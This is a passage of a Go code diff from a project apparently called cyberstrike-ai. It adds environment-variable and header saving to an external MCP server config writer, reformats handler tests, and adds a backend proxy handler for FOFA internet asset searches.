||||
// 设置服务器配置字段
|
||||
if serverCfg.Command != "" {
|
||||
setStringInMap(serverNode, "command", serverCfg.Command)
|
||||
@@ -442,12 +447,26 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
|
||||
if len(serverCfg.Args) > 0 {
|
||||
setStringArrayInMap(serverNode, "args", serverCfg.Args)
|
||||
}
|
||||
// 保存 env 字段(环境变量)
|
||||
if serverCfg.Env != nil && len(serverCfg.Env) > 0 {
|
||||
envNode := ensureMap(serverNode, "env")
|
||||
for envKey, envValue := range serverCfg.Env {
|
||||
setStringInMap(envNode, envKey, envValue)
|
||||
}
|
||||
}
|
||||
if serverCfg.Transport != "" {
|
||||
setStringInMap(serverNode, "transport", serverCfg.Transport)
|
||||
}
|
||||
if serverCfg.URL != "" {
|
||||
setStringInMap(serverNode, "url", serverCfg.URL)
|
||||
}
|
||||
// 保存 headers 字段(HTTP/SSE 请求头)
|
||||
if serverCfg.Headers != nil && len(serverCfg.Headers) > 0 {
|
||||
headersNode := ensureMap(serverNode, "headers")
|
||||
for k, v := range serverCfg.Headers {
|
||||
setStringInMap(headersNode, k, v)
|
||||
}
|
||||
}
|
||||
if serverCfg.Description != "" {
|
||||
setStringInMap(serverNode, "description", serverCfg.Description)
|
||||
}
|
||||
@@ -465,7 +484,7 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
|
||||
}
|
||||
// 保留旧的 enabled/disabled 字段以保持向后兼容
|
||||
originalFields, hasOriginal := originalConfigs[name]
|
||||
|
||||
|
||||
// 如果原始配置中有 enabled 字段,保留它
|
||||
if hasOriginal {
|
||||
if enabledVal, hasEnabled := originalFields["enabled"]; hasEnabled {
|
||||
@@ -483,7 +502,7 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// 如果用户在当前请求中明确设置了这些字段,也保存它们
|
||||
if serverCfg.Enabled {
|
||||
setBoolInMap(serverNode, "enabled", serverCfg.Enabled)
|
||||
@@ -517,8 +536,7 @@ type AddOrUpdateExternalMCPRequest struct {
|
||||
// ExternalMCPResponse 外部MCP响应
|
||||
type ExternalMCPResponse struct {
|
||||
Config config.ExternalMCPServerConfig `json:"config"`
|
||||
Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting"
|
||||
ToolCount int `json:"tool_count"` // 工具数量
|
||||
Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting"
|
||||
ToolCount int `json:"tool_count"` // 工具数量
|
||||
Error string `json:"error,omitempty"` // 错误信息(仅在status为error时存在)
|
||||
}
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@ import (
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
@@ -18,7 +19,7 @@ import (
|
||||
func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
router := gin.New()
|
||||
|
||||
|
||||
// 创建临时配置文件
|
||||
tmpFile, err := os.CreateTemp("", "test-config-*.yaml")
|
||||
if err != nil {
|
||||
@@ -27,7 +28,7 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
|
||||
tmpFile.WriteString("server:\n host: 0.0.0.0\n port: 8080\n")
|
||||
tmpFile.Close()
|
||||
configPath := tmpFile.Name()
|
||||
|
||||
|
||||
logger := zap.NewNop()
|
||||
manager := mcp.NewExternalMCPManager(logger)
|
||||
cfg := &config.Config{
|
||||
@@ -35,9 +36,9 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
|
||||
Servers: make(map[string]config.ExternalMCPServerConfig),
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
handler := NewExternalMCPHandler(manager, cfg, configPath, logger)
|
||||
|
||||
|
||||
api := router.Group("/api")
|
||||
api.GET("/external-mcp", handler.GetExternalMCPs)
|
||||
api.GET("/external-mcp/stats", handler.GetExternalMCPStats)
|
||||
@@ -46,7 +47,7 @@ func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
|
||||
api.DELETE("/external-mcp/:name", handler.DeleteExternalMCP)
|
||||
api.POST("/external-mcp/:name/start", handler.StartExternalMCP)
|
||||
api.POST("/external-mcp/:name/stop", handler.StopExternalMCP)
|
||||
|
||||
|
||||
return router, handler, configPath
|
||||
}
|
||||
|
||||
@@ -58,7 +59,7 @@ func cleanupTestConfig(configPath string) {
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
// 测试添加stdio模式的配置
|
||||
configJSON := `{
|
||||
"command": "python3",
|
||||
@@ -67,41 +68,41 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
|
||||
"timeout": 300,
|
||||
"enabled": true
|
||||
}`
|
||||
|
||||
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-stdio", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
// 验证配置已添加
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-stdio", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
if response.Config.Command != "python3" {
|
||||
t.Errorf("期望command为python3,实际%s", response.Config.Command)
|
||||
}
|
||||
@@ -122,48 +123,48 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
// 测试添加HTTP模式的配置
|
||||
configJSON := `{
|
||||
"transport": "http",
|
||||
"url": "http://127.0.0.1:8081/mcp",
|
||||
"enabled": true
|
||||
}`
|
||||
|
||||
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-http", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
// 验证配置已添加
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-http", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
if response.Config.Transport != "http" {
|
||||
t.Errorf("期望transport为http,实际%s", response.Config.Transport)
|
||||
}
|
||||
@@ -178,7 +179,7 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) {
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
testCases := []struct {
|
||||
name string
|
||||
configJSON string
|
||||
@@ -187,7 +188,7 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
|
||||
{
|
||||
name: "缺少command和url",
|
||||
configJSON: `{"enabled": true}`,
|
||||
expectedErr: "需要指定command(stdio模式)或url(http模式)",
|
||||
expectedErr: "需要指定command(stdio模式)或url(http/sse模式)",
|
||||
},
|
||||
{
|
||||
name: "stdio模式缺少command",
|
||||
@@ -205,34 +206,34 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
|
||||
expectedErr: "不支持的传输模式",
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(tc.configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-invalid", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var response map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
errorMsg := response["error"].(string)
|
||||
// 对于stdio模式缺少command的情况,错误信息可能略有不同
|
||||
if tc.name == "stdio模式缺少command" {
|
||||
@@ -249,28 +250,28 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
|
||||
func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
// 先添加一个配置
|
||||
configObj := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
Enabled: true,
|
||||
}
|
||||
handler.manager.AddOrUpdateConfig("test-delete", configObj)
|
||||
|
||||
|
||||
// 删除配置
|
||||
req := httptest.NewRequest("DELETE", "/api/external-mcp/test-delete", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
// 验证配置已删除
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-delete", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
|
||||
if w2.Code != http.StatusNotFound {
|
||||
t.Errorf("期望状态码404,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
@@ -278,7 +279,7 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||
router, handler, _ := setupTestRouter()
|
||||
|
||||
|
||||
// 添加多个配置
|
||||
handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
@@ -288,20 +289,20 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||
URL: "http://127.0.0.1:8081/mcp",
|
||||
Enabled: false,
|
||||
})
|
||||
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var response map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
servers := response["servers"].(map[string]interface{})
|
||||
if len(servers) != 2 {
|
||||
t.Errorf("期望2个服务器,实际%d", len(servers))
|
||||
@@ -312,7 +313,7 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||
if _, ok := servers["test2"]; !ok {
|
||||
t.Error("期望包含test2")
|
||||
}
|
||||
|
||||
|
||||
stats := response["stats"].(map[string]interface{})
|
||||
if int(stats["total"].(float64)) != 2 {
|
||||
t.Errorf("期望总数为2,实际%d", int(stats["total"].(float64)))
|
||||
@@ -321,7 +322,7 @@ func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
|
||||
router, handler, _ := setupTestRouter()
|
||||
|
||||
|
||||
// 添加配置
|
||||
handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
@@ -336,20 +337,20 @@ func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
|
||||
Enabled: false,
|
||||
Disabled: true,
|
||||
})
|
||||
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var stats map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &stats); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
if int(stats["total"].(float64)) != 3 {
|
||||
t.Errorf("期望总数为3,实际%d", int(stats["total"].(float64)))
|
||||
}
|
||||
@@ -364,19 +365,19 @@ func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
|
||||
func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
// 添加一个禁用的配置
|
||||
handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
Enabled: false,
|
||||
Disabled: true,
|
||||
})
|
||||
|
||||
|
||||
// 测试启动(可能会失败,因为没有真实的服务器)
|
||||
req := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/start", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
// 启动可能会失败,但应该返回合理的状态码
|
||||
if w.Code != http.StatusOK {
|
||||
// 如果启动失败,应该是400或500
|
||||
@@ -384,12 +385,12 @@ func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
|
||||
t.Errorf("期望状态码200/400/500,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// 测试停止
|
||||
req2 := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/stop", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Errorf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
@@ -397,11 +398,11 @@ func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp/nonexistent", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusNotFound {
|
||||
t.Errorf("期望状态码404,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
@@ -410,11 +411,11 @@ func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) {
|
||||
func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
req := httptest.NewRequest("DELETE", "/api/external-mcp/nonexistent", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
// 删除不存在的配置可能返回200(幂等操作)或404,都是合理的
|
||||
if w.Code != http.StatusNotFound && w.Code != http.StatusOK {
|
||||
t.Errorf("期望状态码404或200,实际%d: %s", w.Code, w.Body.String())
|
||||
@@ -423,23 +424,23 @@ func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) {
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
|
||||
configObj := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
Enabled: true,
|
||||
}
|
||||
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
// 空名称应该返回404或400
|
||||
if w.Code != http.StatusNotFound && w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码404或400,实际%d: %s", w.Code, w.Body.String())
|
||||
@@ -448,15 +449,15 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
|
||||
// 发送无效的JSON
|
||||
body := []byte(`{"config": invalid json}`)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
@@ -465,49 +466,49 @@ func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) {
|
||||
func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
|
||||
// 先添加配置
|
||||
config1 := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
Enabled: true,
|
||||
}
|
||||
handler.manager.AddOrUpdateConfig("test-update", config1)
|
||||
|
||||
|
||||
// 更新配置
|
||||
config2 := config.ExternalMCPServerConfig{
|
||||
URL: "http://127.0.0.1:8081/mcp",
|
||||
Enabled: true,
|
||||
}
|
||||
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: config2,
|
||||
}
|
||||
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-update", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
|
||||
// 验证配置已更新
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-update", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
|
||||
if response.Config.URL != "http://127.0.0.1:8081/mcp" {
|
||||
t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL)
|
||||
}
|
||||
@@ -515,4 +516,3 @@ func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
|
||||
t.Errorf("期望command为空,实际%s", response.Config.Command)
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -0,0 +1,223 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
type FofaHandler struct {
|
||||
cfg *config.Config
|
||||
logger *zap.Logger
|
||||
client *http.Client
|
||||
}
|
||||
|
||||
func NewFofaHandler(cfg *config.Config, logger *zap.Logger) *FofaHandler {
|
||||
return &FofaHandler{
|
||||
cfg: cfg,
|
||||
logger: logger,
|
||||
client: &http.Client{Timeout: 30 * time.Second},
|
||||
}
|
||||
}
|
||||
|
||||
type fofaSearchRequest struct {
|
||||
Query string `json:"query" binding:"required"`
|
||||
Size int `json:"size,omitempty"`
|
||||
Page int `json:"page,omitempty"`
|
||||
Fields string `json:"fields,omitempty"`
|
||||
Full bool `json:"full,omitempty"`
|
||||
}
|
||||
|
||||
type fofaAPIResponse struct {
|
||||
Error bool `json:"error"`
|
||||
ErrMsg string `json:"errmsg"`
|
||||
Size int `json:"size"`
|
||||
Page int `json:"page"`
|
||||
Total int `json:"total"`
|
||||
Mode string `json:"mode"`
|
||||
Query string `json:"query"`
|
||||
Results [][]interface{} `json:"results"`
|
||||
}
|
||||
|
||||
type fofaSearchResponse struct {
|
||||
Query string `json:"query"`
|
||||
Size int `json:"size"`
|
||||
Page int `json:"page"`
|
||||
Total int `json:"total"`
|
||||
Fields []string `json:"fields"`
|
||||
ResultsCount int `json:"results_count"`
|
||||
Results []map[string]interface{} `json:"results"`
|
||||
}
|
||||
|
||||
func (h *FofaHandler) resolveCredentials() (email, apiKey string) {
|
||||
// 优先环境变量(便于容器部署),其次配置文件
|
||||
email = strings.TrimSpace(os.Getenv("FOFA_EMAIL"))
|
||||
apiKey = strings.TrimSpace(os.Getenv("FOFA_API_KEY"))
|
||||
if email != "" && apiKey != "" {
|
||||
return email, apiKey
|
||||
}
|
||||
if h.cfg != nil {
|
||||
if email == "" {
|
||||
email = strings.TrimSpace(h.cfg.FOFA.Email)
|
||||
}
|
||||
if apiKey == "" {
|
||||
apiKey = strings.TrimSpace(h.cfg.FOFA.APIKey)
|
||||
}
|
||||
}
|
||||
return email, apiKey
|
||||
}
|
||||
|
||||
func (h *FofaHandler) resolveBaseURL() string {
|
||||
if h.cfg != nil {
|
||||
if v := strings.TrimSpace(h.cfg.FOFA.BaseURL); v != "" {
|
||||
return v
|
||||
}
|
||||
}
|
||||
return "https://fofa.info/api/v1/search/all"
|
||||
}
|
||||
|
||||
// Search FOFA 查询(后端代理,避免前端暴露 key)
|
||||
func (h *FofaHandler) Search(c *gin.Context) {
|
||||
var req fofaSearchRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
req.Query = strings.TrimSpace(req.Query)
|
||||
if req.Query == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "query 不能为空"})
|
||||
return
|
||||
}
|
||||
if req.Size <= 0 {
|
||||
req.Size = 100
|
||||
}
|
||||
if req.Page <= 0 {
|
||||
req.Page = 1
|
||||
}
|
||||
// FOFA 接口 size 上限和账户权限相关,这里只做一个合理的保护
|
||||
if req.Size > 10000 {
|
||||
req.Size = 10000
|
||||
}
|
||||
if req.Fields == "" {
|
||||
req.Fields = "host,ip,port,domain,title,protocol,country,province,city,server"
|
||||
}
|
||||
|
||||
email, apiKey := h.resolveCredentials()
|
||||
if email == "" || apiKey == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": "FOFA 未配置:请在系统设置中填写 FOFA Email/API Key,或设置环境变量 FOFA_EMAIL/FOFA_API_KEY",
|
||||
"need": []string{"fofa.email", "fofa.api_key"},
|
||||
"env_key": []string{"FOFA_EMAIL", "FOFA_API_KEY"},
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
baseURL := h.resolveBaseURL()
|
||||
qb64 := base64.StdEncoding.EncodeToString([]byte(req.Query))
|
||||
|
||||
u, err := url.Parse(baseURL)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "FOFA base_url 无效: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
params := u.Query()
|
||||
params.Set("email", email)
|
||||
params.Set("key", apiKey)
|
||||
params.Set("qbase64", qb64)
|
||||
params.Set("size", fmt.Sprintf("%d", req.Size))
|
||||
params.Set("page", fmt.Sprintf("%d", req.Page))
|
||||
params.Set("fields", strings.TrimSpace(req.Fields))
|
||||
if req.Full {
|
||||
params.Set("full", "true")
|
||||
} else {
|
||||
// 明确传 false,便于排查
|
||||
params.Set("full", "false")
|
||||
}
|
||||
u.RawQuery = params.Encode()
|
||||
|
||||
httpReq, err := http.NewRequestWithContext(c.Request.Context(), http.MethodGet, u.String(), nil)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建请求失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "请求 FOFA 失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": fmt.Sprintf("FOFA 返回非 2xx: %d", resp.StatusCode)})
|
||||
return
|
||||
}
|
||||
|
||||
var apiResp fofaAPIResponse
|
||||
if err := json.NewDecoder(resp.Body).Decode(&apiResp); err != nil {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "解析 FOFA 响应失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if apiResp.Error {
|
||||
msg := strings.TrimSpace(apiResp.ErrMsg)
|
||||
if msg == "" {
|
||||
msg = "FOFA 返回错误"
|
||||
}
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": msg})
|
||||
return
|
||||
}
|
||||
|
||||
fields := splitAndCleanCSV(req.Fields)
|
||||
results := make([]map[string]interface{}, 0, len(apiResp.Results))
|
||||
for _, row := range apiResp.Results {
|
||||
item := make(map[string]interface{}, len(fields))
|
||||
for i, f := range fields {
|
||||
if i < len(row) {
|
||||
item[f] = row[i]
|
||||
} else {
|
||||
item[f] = nil
|
||||
}
|
||||
}
|
||||
results = append(results, item)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, fofaSearchResponse{
|
||||
Query: req.Query,
|
||||
Size: apiResp.Size,
|
||||
Page: apiResp.Page,
|
||||
Total: apiResp.Total,
|
||||
Fields: fields,
|
||||
ResultsCount: len(results),
|
||||
Results: results,
|
||||
})
|
||||
}
|
||||
|
||||
func splitAndCleanCSV(s string) []string {
|
||||
parts := strings.Split(s, ",")
|
||||
out := make([]string, 0, len(parts))
|
||||
seen := make(map[string]struct{}, len(parts))
|
||||
for _, p := range parts {
|
||||
v := strings.TrimSpace(p)
|
||||
if v == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[v]; ok {
|
||||
continue
|
||||
}
|
||||
seen[v] = struct{}{}
|
||||
out = append(out, v)
|
||||
}
|
||||
return out
|
||||
}
|
||||
@@ -189,8 +189,18 @@ type GroupConversation struct {
|
||||
// GetGroupConversations 获取分组中的所有对话
|
||||
func (h *GroupHandler) GetGroupConversations(c *gin.Context) {
|
||||
groupID := c.Param("id")
|
||||
searchQuery := c.Query("search") // 获取搜索参数
|
||||
|
||||
var conversations []*database.Conversation
|
||||
var err error
|
||||
